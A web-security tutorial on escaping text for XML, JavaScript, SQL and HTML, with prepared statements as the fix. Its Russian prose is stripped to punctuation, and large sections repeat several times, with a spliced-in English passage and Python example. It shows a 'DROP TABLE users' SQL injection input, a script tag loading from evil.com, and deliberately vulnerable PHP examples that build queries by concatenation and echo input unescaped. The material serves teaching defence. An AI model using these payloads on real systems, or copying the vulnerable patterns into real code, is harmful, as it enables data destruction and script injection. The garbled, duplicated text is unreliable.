<div class="post"> <p class="meta"> Posted by Plato on January 2, 15:31 </p> <p class="body"> I am said to have said "Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat." </p> </div>

, , , , :

<div class="post"> <p class="meta"> Posted by Pascal on November 23, 04:12 </p> <p class="body"> Basic math tells us that if x < n and y > n, x cannot be larger than y. </p> </div>

... . , , , ?



<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> <script src="http://evil.com/dangerous.js" type="text/javascript" charset="utf-8"></script> </p> </div>

, , ? - javascript ? , , , . .





, - , , ! , "" , , . ?



? , ? , , ""? , !

, . - :

$name = $_POST['name']; $name = mysql_real_escape_string($name); $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);

, "" . SQL-, :

Alex

SELECT phone_number FROM users WHERE name = 'Alex'

Mc'Donalds

SELECT phone_number FROM users WHERE name = 'Mc\'Donalds'

Joe'; DROP TABLE users; --

SELECT phone_number FROM users WHERE name = 'Joe\'; DROP TABLE users; --'

mysql_real_escape_string , - .



, :

<div class="post"> <p class="meta"> Posted by <?php echo htmlspecialchars($post['username']); ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo htmlspecialchars($post['body']); ?> </p> </div>

htmlspecialchars , , . :

<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> &lt;script src=&quot;http://evil.com/dangerous.js&quot; type=&quot;text/javascript&quot; charset=&quot;utf-8&quot;&gt;&lt;/script&gt; </p> </div>

, , , "". HTML .



...

, : , , . SQL, SQL. HTML, HTML. ( ), ( ). .





, , , :

Validation

, . , , . , "DROP TABLE users" , , , "42". , HTML/SQL-, .. , "". . Sanitization

"" , . , - HTML-, . , .

Prepared SQL statements

, , : SQL- , . :

$stmt = $pdo->prepare('SELECT phone_number FROM users WHERE name = ?'); $stmt->execute($_POST['name']);

, . , .





, . (), , . ( ) . "" - , . , , , SQL- ( HTML).

? , - ? XML - . . . , - , i .

, - .

<?xml version="1.0" encoding="UTF-8" ?> <article> <author>Homo Sapiens</author> <contents> Basic math tells us that if x &lt; n and y &gt; n, x cannot be larger than y. </contents> </article>


, . "&lt;" "<", "&gt;" - ">".

- , , , .

escape |iˈskāp| [ no obj. ] [ with obj. ] / [...] [ with obj. ] IT: - [...]

, , , , . , , : " , ?" .

, (&) - . , "&lt;", "<"? XML, escape- &, - " &amp; ", .. : " &amp;&lt; "





XML - "" . , :

var name = "Homo Sapiens"; var contents = "Suppose, there is the English text, which I don't wanna translate into Russian";

- " " . :

var name = "Homo Sapiens"; var contents = "Basic math tells us that if x < n and y > n, x cannot be larger than y.";

! ! , , , -?

var name = "Homo Sapiens"; var contents = "Plato is said to once have said "Lorem ipsum dolor sit amet".";

... , . , . . - , " ", . :

var name = "Homo Sapiens"; var contents = "Plato is said to once have said \"Lorem ipsum dolor sit amet\".";

"\" . , -, , "\" - . , , : "\\". , ?



!

, . , . , , "". , , . , , , , HTML, , , , HTML, , , "" HTML .



- SQL . SQL - , :

SELECT phone_number FROM users WHERE name = 'Alex'

, . , SQL . , :

$query = "SELECT phone_number FROM users WHERE name = 'Alex'"; $result = mysql_query($query);

, . "", , , , . , - .



, , -, . , :

$name = $_POST['name']; $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);

, : - -! , - ! ! , - , ! !



, . $_POST['name'] - , -. SQL-, , . SQL "" .



, ? , - :



Alex

SELECT phone_number FROM users WHERE name = 'Alex'

Mc'Donalds

SELECT phone_number FROM users WHERE name = 'Mc'Donalds'

Joe'; DROP TABLE users; --

SELECT phone_number FROM users WHERE name = 'Joe'; DROP TABLE users; --'

, , ? 2, , "" - '. ! 4 - . ? ...

, ... , . , - : Joe, users ( '), .



. , , , , , 10 . SQL-, . , , , , , .. , - "" .



!

: XSS . , HTML.

, , , -, . , , .. - - :

<div class="post"> <p class="meta"> Posted by <?php echo $post['username']; ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo $post['body']; ?> </p> </div>

, , :

<div class="post"> <p class="meta"> Posted by Plato on January 2, 15:31 </p> <p class="body"> I am said to have said "Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat." </p> </div>

, , , , :

<div class="post"> <p class="meta"> Posted by Pascal on November 23, 04:12 </p> <p class="body"> Basic math tells us that if x < n and y > n, x cannot be larger than y. </p> </div>

... . , , , ?



<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> <script src="http://evil.com/dangerous.js" type="text/javascript" charset="utf-8"></script> </p> </div>

, , ? - javascript ? , , , . .





, - , , ! , "" , , . ?



? , ? , , ""? , !

, . - :

$name = $_POST['name']; $name = mysql_real_escape_string($name); $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);

, "" . SQL-, :

Alex

SELECT phone_number FROM users WHERE name = 'Alex'

Mc'Donalds

SELECT phone_number FROM users WHERE name = 'Mc\'Donalds'

Joe'; DROP TABLE users; --

SELECT phone_number FROM users WHERE name = 'Joe\'; DROP TABLE users; --'

mysql_real_escape_string , - .



, :

<div class="post"> <p class="meta"> Posted by <?php echo htmlspecialchars($post['username']); ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo htmlspecialchars($post['body']); ?> </p> </div>

htmlspecialchars , , . :

<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> &lt;script src=&quot;http://evil.com/dangerous.js&quot; type=&quot;text/javascript&quot; charset=&quot;utf-8&quot;&gt;&lt;/script&gt; </p> </div>

, , , "". HTML .



...

, : , , . SQL, SQL. HTML, HTML. ( ), ( ). .





, , , :

Validation

, . , , . , "DROP TABLE users" , , , "42". , HTML/SQL-, .. , "". . Sanitization

"" , . , - HTML-, . , .

Prepared SQL statements

, , : SQL- , . :

$stmt = $pdo->prepare('SELECT phone_number FROM users WHERE name = ?'); $stmt->execute($_POST['name']);

, . , .





, . (), , . ( ) . "" - , . , , , SQL- ( HTML).
 ?   ,    -  ?  XML -  .   .  .       ,  -      ,         i    . 
    

, - .

<?xml version="1.0" encoding="UTF-8" ?> <article> <author>Homo Sapiens</author> <contents> Basic math tells us that if x &lt; n and y &gt; n, x cannot be larger than y. </contents> </article>


, . "&lt;" "<", "&gt;" - ">".

- , , , .

escape |iˈskāp| [ no obj. ] [ with obj. ] / [...] [ with obj. ] IT: - [...]

, , , , . , , : " , ?" .

, (&) - . , "&lt;", "<"? XML, escape- &, - " &amp; ", .. : " &amp;&lt; "





XML - "" . , :

var name = "Homo Sapiens"; var contents = "Suppose, there is the English text, which I don't wanna translate into Russian";

- " " . :

var name = "Homo Sapiens"; var contents = "Basic math tells us that if x < n and y > n, x cannot be larger than y.";

! ! , , , -?

var name = "Homo Sapiens"; var contents = "Plato is said to once have said "Lorem ipsum dolor sit amet".";

... , . , . . - , " ", . :

var name = "Homo Sapiens"; var contents = "Plato is said to once have said \"Lorem ipsum dolor sit amet\".";

"\" . , -, , "\" - . , , : "\\". , ?



!

, . , . , , "". , , . , , , , HTML, , , , HTML, , , "" HTML .



- SQL . SQL - , :

SELECT phone_number FROM users WHERE name = 'Alex'

, . , SQL . , :

$query = "SELECT phone_number FROM users WHERE name = 'Alex'"; $result = mysql_query($query);

, . "", , , , . , - .



, , -, . , :

$name = $_POST['name']; $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);

, : - -! , - ! ! , - , ! !



, . $_POST['name'] - , -. SQL-, , . SQL "" .



, ? , - :



Alex

SELECT phone_number FROM users WHERE name = 'Alex'

Mc'Donalds

SELECT phone_number FROM users WHERE name = 'Mc'Donalds'

Joe'; DROP TABLE users; --

SELECT phone_number FROM users WHERE name = 'Joe'; DROP TABLE users; --'

, , ? 2, , "" - '. ! 4 - . ? ...

, ... , . , - : Joe, users ( '), .



. , , , , , 10 . SQL-, . , , , , , .. , - "" .



!

: XSS . , HTML.

, , , -, . , , .. - - :

<div class="post"> <p class="meta"> Posted by <?php echo $post['username']; ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo $post['body']; ?> </p> </div>

, , :

<div class="post"> <p class="meta"> Posted by Plato on January 2, 15:31 </p> <p class="body"> I am said to have said "Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat." </p> </div>

, , , , :

<div class="post"> <p class="meta"> Posted by Pascal on November 23, 04:12 </p> <p class="body"> Basic math tells us that if x < n and y > n, x cannot be larger than y. </p> </div>

... . , , , ?



<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> <script src="http://evil.com/dangerous.js" type="text/javascript" charset="utf-8"></script> </p> </div>

, , ? - javascript ? , , , . .





, - , , ! , "" , , . ?



? , ? , , ""? , !

, . - :

$name = $_POST['name']; $name = mysql_real_escape_string($name); $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);

, "" . SQL-, :

Alex

SELECT phone_number FROM users WHERE name = 'Alex'

Mc'Donalds

SELECT phone_number FROM users WHERE name = 'Mc\'Donalds'

Joe'; DROP TABLE users; --

SELECT phone_number FROM users WHERE name = 'Joe\'; DROP TABLE users; --'

The apostrophe is still in the query, but with the backslash in front of it the SQL parser reads it as part of the name rather than as the end of the string, so the query means what it was meant to mean.

The same for HTML:

<div class="post">
    <p class="meta">
        Posted by <?php echo htmlspecialchars($post['username']); ?>
        on <?php echo date('F j, H:i', $post['date']); ?>
    </p>
    <p class="body">
        <?php echo htmlspecialchars($post['body']); ?>
    </p>
</div>

htmlspecialchars replaces the characters that are special in HTML (<, >, & and the quotes) with entities. The JackTR post now comes out as:

<div class="post">
    <p class="meta">
        Posted by JackTR on July 18, 12:56
    </p>
    <p class="body">
        &lt;script src=&quot;http://evil.com/dangerous.js&quot; type=&quot;text/javascript&quot; charset=&quot;utf-8&quot;&gt;&lt;/script&gt;
    </p>
</div>

The browser shows the script tag as literal text; none of it is parsed as HTML.

Escape text for the format it is going into: SQL escaping for SQL, HTML escaping for HTML. Each format has its own special characters and its own escaping rules.

A few other techniques are often mentioned alongside escaping:

Validation

Validation means checking that the input is what you expect before using it at all. "DROP TABLE users" is not a plausible value for an age field, but "42" is. Validation does not replace HTML or SQL escaping, though: perfectly valid input can still contain characters that are special to the format it is pasted into.

Sanitization

Sanitization removes or alters the parts of the input that are not allowed, for example stripping HTML tags from a post. Unlike escaping, it changes the user's data instead of representing it faithfully.

Prepared SQL statements

Prepared statements keep the SQL text and the data apart: the query is sent to the database with placeholders, and the values are sent separately, so they are never parsed as SQL:

$stmt = $pdo->prepare('SELECT phone_number FROM users WHERE name = ?');
$stmt->execute([$_POST['name']]);  // execute() takes the parameter values as an array

No escaping is needed here, because nothing is ever pasted into the query text.

To sum up: everything is text. Some of that text is meant for a parser (SQL, HTML, XML, a programming language), and when other text is placed inside it, the parser cannot know where the data ends unless it has been escaped by that parser's rules.

Back to the XML example from the beginning. What if the text itself contains one of the characters the format uses, such as < or >? A parser that sees < expects a tag to follow. XML's answer is to write such characters differently:

<?xml version="1.0" encoding="UTF-8" ?>
<article>
    <author>Homo Sapiens</author>
    <contents>
        Basic math tells us that if x &lt; n and y &gt; n, x cannot be larger than y.
    </contents>
</article>


The parser knows that "&lt;" stands for "<" and "&gt;" for ">", and turns them back into those characters when it extracts the text. This is called escaping.

escape |iˈskāp| [...] IT: [...]

A parser that meets "&lt;" knows it is looking at an escaped character and not at markup. But now the ampersand (&) has a special meaning of its own: how do you write a literal "&lt;" and have it read as those four characters rather than as "<"? XML escapes the escape character too: a literal & is written "&amp;", so for instance the two characters "&<" become "&amp;&lt;".





XML is not the only format with this problem. Take string literals in a programming language, JavaScript for instance:

var name = "Homo Sapiens";
var contents = "Suppose, there is the English text, which I don't wanna translate into Russian";

The quote characters mark where the string starts and ends. The second text works the same way:

var name = "Homo Sapiens";
var contents = "Basic math tells us that if x < n and y > n, x cannot be larger than y.";

Fine as well; < and > mean nothing inside a JavaScript string. But what if the text itself contains a quote?

var name = "Homo Sapiens";
var contents = "Plato is said to once have said "Lorem ipsum dolor sit amet".";  // syntax error: the quote before Lorem ends the string

That no longer parses: the quote after "said " closes the string, and what follows it is a syntax error. JavaScript's way out is the backslash, which tells the parser that the next character belongs to the string:

var name = "Homo Sapiens";
var contents = "Plato is said to once have said \"Lorem ipsum dolor sit amet\".";

The backslash is JavaScript's escape character. And if the string itself has to contain a backslash, the escape character is escaped, just as & was in XML: "\\". Sound familiar?

Escaping!

The principle is always the same. A format reserves a few characters for its own use, and to put those characters into it as plain text you escape them according to that format's rules. Which rules apply depends on what will parse the text: something that will be read as HTML has to be escaped for HTML, and escaping it by the rules of another format does not help.



Now SQL. A SQL query is text too:

SELECT phone_number FROM users WHERE name = 'Alex'

The database parses that text to work out what it is being asked for. Usually the query is not typed by hand but built by a program written in another language, PHP for instance:

$query = "SELECT phone_number FROM users WHERE name = 'Alex'";
$result = mysql_query($query);
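The three escaping rules and the prepared statement from the sections above, worked on the page's own inputs, as an added example that is not part of the original article. The article's snippets are PHP; this uses Python so that the prepared statement can actually run (sqlite3 in memory). It assumes MySQL's rules for mysql_escape(), which re-implements the character set of mysql_real_escape_string rather than calling it, and the users table with its phone numbers is constructed sample data.

```python
"""Context-specific escaping, and a prepared statement, on the page's inputs."""
import html
import json
import sqlite3

# Characters MySQL treats specially inside a quoted string literal and the
# backslash sequences that stand for them (the set mysql_real_escape_string
# handles). Re-implemented here, not PHP's function. Assumption: MySQL rules.
MYSQL_SPECIALS = {
    "\\": "\\\\", "'": "\\'", '"': '\\"',
    "\n": "\\n", "\r": "\\r", "\0": "\\0", "\x1a": "\\Z",
}


def mysql_escape(value: str) -> str:
    """Escape for a MySQL string literal. Only right for that parser: SQLite,
    for one, does not know backslash escapes, so the same output is wrong there."""
    return "".join(MYSQL_SPECIALS.get(ch, ch) for ch in value)


def html_escape(text: str) -> str:
    """What htmlspecialchars does on the page: <, >, & and quotes become entities."""
    return html.escape(text, quote=True)


def js_string_literal(text: str) -> str:
    """A JSON string literal is also a JavaScript string literal; quotes and
    backslashes inside it get a backslash in front, as on the page."""
    return json.dumps(text)


def sql_by_concatenation(name: str) -> str:
    """The page's vulnerable pattern: the user's text is pasted into the SQL text."""
    return "SELECT phone_number FROM users WHERE name = '" + name + "'"


def sql_with_mysql_escaping(name: str) -> str:
    """The page's MySQL fix: escape first, then paste."""
    return sql_by_concatenation(mysql_escape(name))


def make_db() -> sqlite3.Connection:
    """Constructed in-memory users table (sample data, not from the page)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (name TEXT, phone_number TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?)",
                     [("Alex", "555-0101"), ("Mc'Donalds", "555-0102")])
    return conn


def lookup_concatenated(conn: sqlite3.Connection, name: str):
    """Run the concatenated query. Returns the rows, or the class name of the
    error the SQL parser raised once the pasted-in text changed the query's
    shape (sqlite3 refuses to run a second statement, so nothing is dropped)."""
    try:
        return conn.execute(sql_by_concatenation(name)).fetchall()
    except (sqlite3.Error, sqlite3.Warning) as exc:
        return type(exc).__name__


def lookup_prepared(conn: sqlite3.Connection, name: str):
    """The page's prepared-statement pattern: the SQL text is fixed and the
    name travels separately as data, so it is never parsed as SQL."""
    return conn.execute(
        "SELECT phone_number FROM users WHERE name = ?", (name,)).fetchall()


def table_exists(conn: sqlite3.Connection, table: str) -> bool:
    row = conn.execute(
        "SELECT 1 FROM sqlite_master WHERE type = 'table' AND name = ?",
        (table,)).fetchone()
    return row is not None


if __name__ == "__main__":
    names = ["Alex", "Mc'Donalds", "Joe'; DROP TABLE users; --"]  # from the page
    for n in names:
        print(sql_by_concatenation(n))
        print(sql_with_mysql_escaping(n))
    print(html_escape('<script src="http://evil.com/dangerous.js"></script>'))
    print(js_string_literal('Plato is said to once have said "Lorem ipsum dolor sit amet".'))

    db = make_db()
    for n in names:
        print(repr(n), "concatenated:", lookup_concatenated(db, n),
              "prepared:", lookup_prepared(db, n))
    # MySQL escaping fed to SQLite: the right rules for the wrong parser, so
    # even the legitimate name still breaks the query.
    print(lookup_concatenated(db, mysql_escape("Mc'Donalds")))
    print("users table still there:", table_exists(db, "users"))
```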

, . "", , , , . , - .



, , -, . , :

$name = $_POST['name']; $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);

, : - -! , - ! ! , - , ! !



, . $_POST['name'] - , -. SQL-, , . SQL "" .



, ? , - :



Alex

SELECT phone_number FROM users WHERE name = 'Alex'

Mc'Donalds

SELECT phone_number FROM users WHERE name = 'Mc'Donalds'

Joe'; DROP TABLE users; --

SELECT phone_number FROM users WHERE name = 'Joe'; DROP TABLE users; --'

, , ? 2, , "" - '. ! 4 - . ? ...

, ... , . , - : Joe, users ( '), .



. , , , , , 10 . SQL-, . , , , , , .. , - "" .



!

: XSS . , HTML.

, , , -, . , , .. - - :

<div class="post"> <p class="meta"> Posted by <?php echo $post['username']; ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo $post['body']; ?> </p> </div>

, , :

<div class="post"> <p class="meta"> Posted by Plato on January 2, 15:31 </p> <p class="body"> I am said to have said "Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat." </p> </div>

, , , , :

<div class="post"> <p class="meta"> Posted by Pascal on November 23, 04:12 </p> <p class="body"> Basic math tells us that if x < n and y > n, x cannot be larger than y. </p> </div>

... . , , , ?



<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> <script src="http://evil.com/dangerous.js" type="text/javascript" charset="utf-8"></script> </p> </div>

, , ? - javascript ? , , , . .





, - , , ! , "" , , . ?



? , ? , , ""? , !

, . - :

$name = $_POST['name']; $name = mysql_real_escape_string($name); $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);

, "" . SQL-, :

Alex

SELECT phone_number FROM users WHERE name = 'Alex'

Mc'Donalds

SELECT phone_number FROM users WHERE name = 'Mc\'Donalds'

Joe'; DROP TABLE users; --

SELECT phone_number FROM users WHERE name = 'Joe\'; DROP TABLE users; --'

mysql_real_escape_string , - .



, :

<div class="post"> <p class="meta"> Posted by <?php echo htmlspecialchars($post['username']); ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo htmlspecialchars($post['body']); ?> </p> </div>

htmlspecialchars , , . :

<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> &lt;script src=&quot;http://evil.com/dangerous.js&quot; type=&quot;text/javascript&quot; charset=&quot;utf-8&quot;&gt;&lt;/script&gt; </p> </div>

, , , "". HTML .



...

, : , , . SQL, SQL. HTML, HTML. ( ), ( ). .





, , , :

Validation

, . , , . , "DROP TABLE users" , , , "42". , HTML/SQL-, .. , "". . Sanitization

"" , . , - HTML-, . , .

Prepared SQL statements

, , : SQL- , . :

$stmt = $pdo->prepare('SELECT phone_number FROM users WHERE name = ?'); $stmt->execute($_POST['name']);

, . , .





, . (), , . ( ) . "" - , . , , , SQL- ( HTML).
 ?   ,    -  ?  XML -  .   .  .       ,  -      ,         i    . 
    

, - .

<?xml version="1.0" encoding="UTF-8" ?> <article> <author>Homo Sapiens</author> <contents> Basic math tells us that if x &lt; n and y &gt; n, x cannot be larger than y. </contents> </article>


, . "&lt;" "<", "&gt;" - ">".

- , , , .

escape |iˈskāp| [ no obj. ] [ with obj. ] / [...] [ with obj. ] IT: - [...]

, , , , . , , : " , ?" .

, (&) - . , "&lt;", "<"? XML, escape- &, - " &amp; ", .. : " &amp;&lt; "





XML - "" . , :

var name = "Homo Sapiens"; var contents = "Suppose, there is the English text, which I don't wanna translate into Russian";

- " " . :

var name = "Homo Sapiens"; var contents = "Basic math tells us that if x < n and y > n, x cannot be larger than y.";

! ! , , , -?

var name = "Homo Sapiens"; var contents = "Plato is said to once have said "Lorem ipsum dolor sit amet".";

... , . , . . - , " ", . :

var name = "Homo Sapiens"; var contents = "Plato is said to once have said \"Lorem ipsum dolor sit amet\".";

"\" . , -, , "\" - . , , : "\\". , ?



!

, . , . , , "". , , . , , , , HTML, , , , HTML, , , "" HTML .



- SQL . SQL - , :

SELECT phone_number FROM users WHERE name = 'Alex'

, . , SQL . , :

$query = "SELECT phone_number FROM users WHERE name = 'Alex'"; $result = mysql_query($query);

, . "", , , , . , - .



, , -, . , :

$name = $_POST['name']; $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);

, : - -! , - ! ! , - , ! !



, . $_POST['name'] - , -. SQL-, , . SQL "" .



, ? , - :



Alex

SELECT phone_number FROM users WHERE name = 'Alex'

Mc'Donalds

SELECT phone_number FROM users WHERE name = 'Mc'Donalds'

Joe'; DROP TABLE users; --

SELECT phone_number FROM users WHERE name = 'Joe'; DROP TABLE users; --'

, , ? 2, , "" - '. ! 4 - . ? ...

, ... , . , - : Joe, users ( '), .



. , , , , , 10 . SQL-, . , , , , , .. , - "" .



!

: XSS . , HTML.

, , , -, . , , .. - - :

<div class="post"> <p class="meta"> Posted by <?php echo $post['username']; ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo $post['body']; ?> </p> </div>

, , :

<div class="post"> <p class="meta"> Posted by Plato on January 2, 15:31 </p> <p class="body"> I am said to have said "Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat." </p> </div>

, , , , :

<div class="post"> <p class="meta"> Posted by Pascal on November 23, 04:12 </p> <p class="body"> Basic math tells us that if x < n and y > n, x cannot be larger than y. </p> </div>

... . , , , ?



<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> <script src="http://evil.com/dangerous.js" type="text/javascript" charset="utf-8"></script> </p> </div>

, , ? - javascript ? , , , . .





, - , , ! , "" , , . ?



? , ? , , ""? , !

, . - :

$name = $_POST['name']; $name = mysql_real_escape_string($name); $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);

, "" . SQL-, :

Alex

SELECT phone_number FROM users WHERE name = 'Alex'

Mc'Donalds

SELECT phone_number FROM users WHERE name = 'Mc\'Donalds'

Joe'; DROP TABLE users; --

SELECT phone_number FROM users WHERE name = 'Joe\'; DROP TABLE users; --'

mysql_real_escape_string , - .



, :

<div class="post"> <p class="meta"> Posted by <?php echo htmlspecialchars($post['username']); ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo htmlspecialchars($post['body']); ?> </p> </div>

htmlspecialchars , , . :

<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> &lt;script src=&quot;http://evil.com/dangerous.js&quot; type=&quot;text/javascript&quot; charset=&quot;utf-8&quot;&gt;&lt;/script&gt; </p> </div>

, , , "". HTML .



...

, : , , . SQL, SQL. HTML, HTML. ( ), ( ). .





, , , :

Validation

, . , , . , "DROP TABLE users" , , , "42". , HTML/SQL-, .. , "". . Sanitization

"" , . , - HTML-, . , .

Prepared SQL statements

, , : SQL- , . :

$stmt = $pdo->prepare('SELECT phone_number FROM users WHERE name = ?'); $stmt->execute($_POST['name']);

, . , .





, . (), , . ( ) . "" - , . , , , SQL- ( HTML).
? , - ? XML - . . . , - , i .

, - .

<?xml version="1.0" encoding="UTF-8" ?> <article> <author>Homo Sapiens</author> <contents> Basic math tells us that if x &lt; n and y &gt; n, x cannot be larger than y. </contents> </article>


, . "&lt;" "<", "&gt;" - ">".

- , , , .

escape |iˈskāp| [ no obj. ] [ with obj. ] / [...] [ with obj. ] IT: - [...]

, , , , . , , : " , ?" .

, (&) - . , "&lt;", "<"? XML, escape- &, - " &amp; ", .. : " &amp;&lt; "





XML - "" . , :

var name = "Homo Sapiens"; var contents = "Suppose, there is the English text, which I don't wanna translate into Russian";

- " " . :

var name = "Homo Sapiens"; var contents = "Basic math tells us that if x < n and y > n, x cannot be larger than y.";

! ! , , , -?

var name = "Homo Sapiens"; var contents = "Plato is said to once have said "Lorem ipsum dolor sit amet".";

... , . , . . - , " ", . :

var name = "Homo Sapiens"; var contents = "Plato is said to once have said \"Lorem ipsum dolor sit amet\".";

"\" . , -, , "\" - . , , : "\\". , ?



!

, . , . , , "". , , . , , , , HTML, , , , HTML, , , "" HTML .



- SQL . SQL - , :

SELECT phone_number FROM users WHERE name = 'Alex'

, . , SQL . , :

$query = "SELECT phone_number FROM users WHERE name = 'Alex'"; $result = mysql_query($query);

, . "", , , , . , - .



, , -, . , :

$name = $_POST['name']; $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);

, : - -! , - ! ! , - , ! !



, . $_POST['name'] - , -. SQL-, , . SQL "" .



, ? , - :



Alex

SELECT phone_number FROM users WHERE name = 'Alex'

Mc'Donalds

SELECT phone_number FROM users WHERE name = 'Mc'Donalds'

Joe'; DROP TABLE users; --

SELECT phone_number FROM users WHERE name = 'Joe'; DROP TABLE users; --'

, , ? 2, , "" - '. ! 4 - . ? ...

, ... , . , - : Joe, users ( '), .



. , , , , , 10 . SQL-, . , , , , , .. , - "" .



!

: XSS . , HTML.

, , , -, . , , .. - - :

<div class="post"> <p class="meta"> Posted by <?php echo $post['username']; ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo $post['body']; ?> </p> </div>

, , :

<div class="post"> <p class="meta"> Posted by Plato on January 2, 15:31 </p> <p class="body"> I am said to have said "Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat." </p> </div>

, , , , :

<div class="post"> <p class="meta"> Posted by Pascal on November 23, 04:12 </p> <p class="body"> Basic math tells us that if x < n and y > n, x cannot be larger than y. </p> </div>

... . , , , ?



<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> <script src="http://evil.com/dangerous.js" type="text/javascript" charset="utf-8"></script> </p> </div>

, , ? - javascript ? , , , . .





, - , , ! , "" , , . ?



? , ? , , ""? , !

, . - :

$name = $_POST['name']; $name = mysql_real_escape_string($name); $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);

, "" . SQL-, :

Alex

SELECT phone_number FROM users WHERE name = 'Alex'

Mc'Donalds

SELECT phone_number FROM users WHERE name = 'Mc\'Donalds'

Joe'; DROP TABLE users; --

SELECT phone_number FROM users WHERE name = 'Joe\'; DROP TABLE users; --'

mysql_real_escape_string , - .



, :

<div class="post"> <p class="meta"> Posted by <?php echo htmlspecialchars($post['username']); ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo htmlspecialchars($post['body']); ?> </p> </div>

htmlspecialchars , , . :

<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> &lt;script src=&quot;http://evil.com/dangerous.js&quot; type=&quot;text/javascript&quot; charset=&quot;utf-8&quot;&gt;&lt;/script&gt; </p> </div>

, , , "". HTML .



...

, : , , . SQL, SQL. HTML, HTML. ( ), ( ). .





, , , :

Validation

, . , , . , "DROP TABLE users" , , , "42". , HTML/SQL-, .. , "". . Sanitization

"" , . , - HTML-, . , .

Prepared SQL statements

, , : SQL- , . :

$stmt = $pdo->prepare('SELECT phone_number FROM users WHERE name = ?'); $stmt->execute($_POST['name']);

, . , .





, . (), , . ( ) . "" - , . , , , SQL- ( HTML).
 ?   ,    -  ?  XML -  .   .  .       ,  -      ,         i    . 
    

, - .

<?xml version="1.0" encoding="UTF-8" ?> <article> <author>Homo Sapiens</author> <contents> Basic math tells us that if x &lt; n and y &gt; n, x cannot be larger than y. </contents> </article>


, . "&lt;" "<", "&gt;" - ">".

- , , , .

escape |iˈskāp| [ no obj. ] [ with obj. ] / [...] [ with obj. ] IT: - [...]

, , , , . , , : " , ?" .

, (&) - . , "&lt;", "<"? XML, escape- &, - " &amp; ", .. : " &amp;&lt; "





XML - "" . , :

var name = "Homo Sapiens"; var contents = "Suppose, there is the English text, which I don't wanna translate into Russian";

- " " . :

var name = "Homo Sapiens"; var contents = "Basic math tells us that if x < n and y > n, x cannot be larger than y.";

! ! , , , -?

var name = "Homo Sapiens"; var contents = "Plato is said to once have said "Lorem ipsum dolor sit amet".";

... , . , . . - , " ", . :

var name = "Homo Sapiens"; var contents = "Plato is said to once have said \"Lorem ipsum dolor sit amet\".";

"\" . , -, , "\" - . , , : "\\". , ?



!

, . , . , , "". , , . , , , , HTML, , , , HTML, , , "" HTML .



- SQL . SQL - , :

SELECT phone_number FROM users WHERE name = 'Alex'

, . , SQL . , :

$query = "SELECT phone_number FROM users WHERE name = 'Alex'"; $result = mysql_query($query);

, . "", , , , . , - .



, , -, . , :

$name = $_POST['name']; $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);

, : - -! , - ! ! , - , ! !



, . $_POST['name'] - , -. SQL-, , . SQL "" .



, ? , - :



Alex

SELECT phone_number FROM users WHERE name = 'Alex'

Mc'Donalds

SELECT phone_number FROM users WHERE name = 'Mc'Donalds'

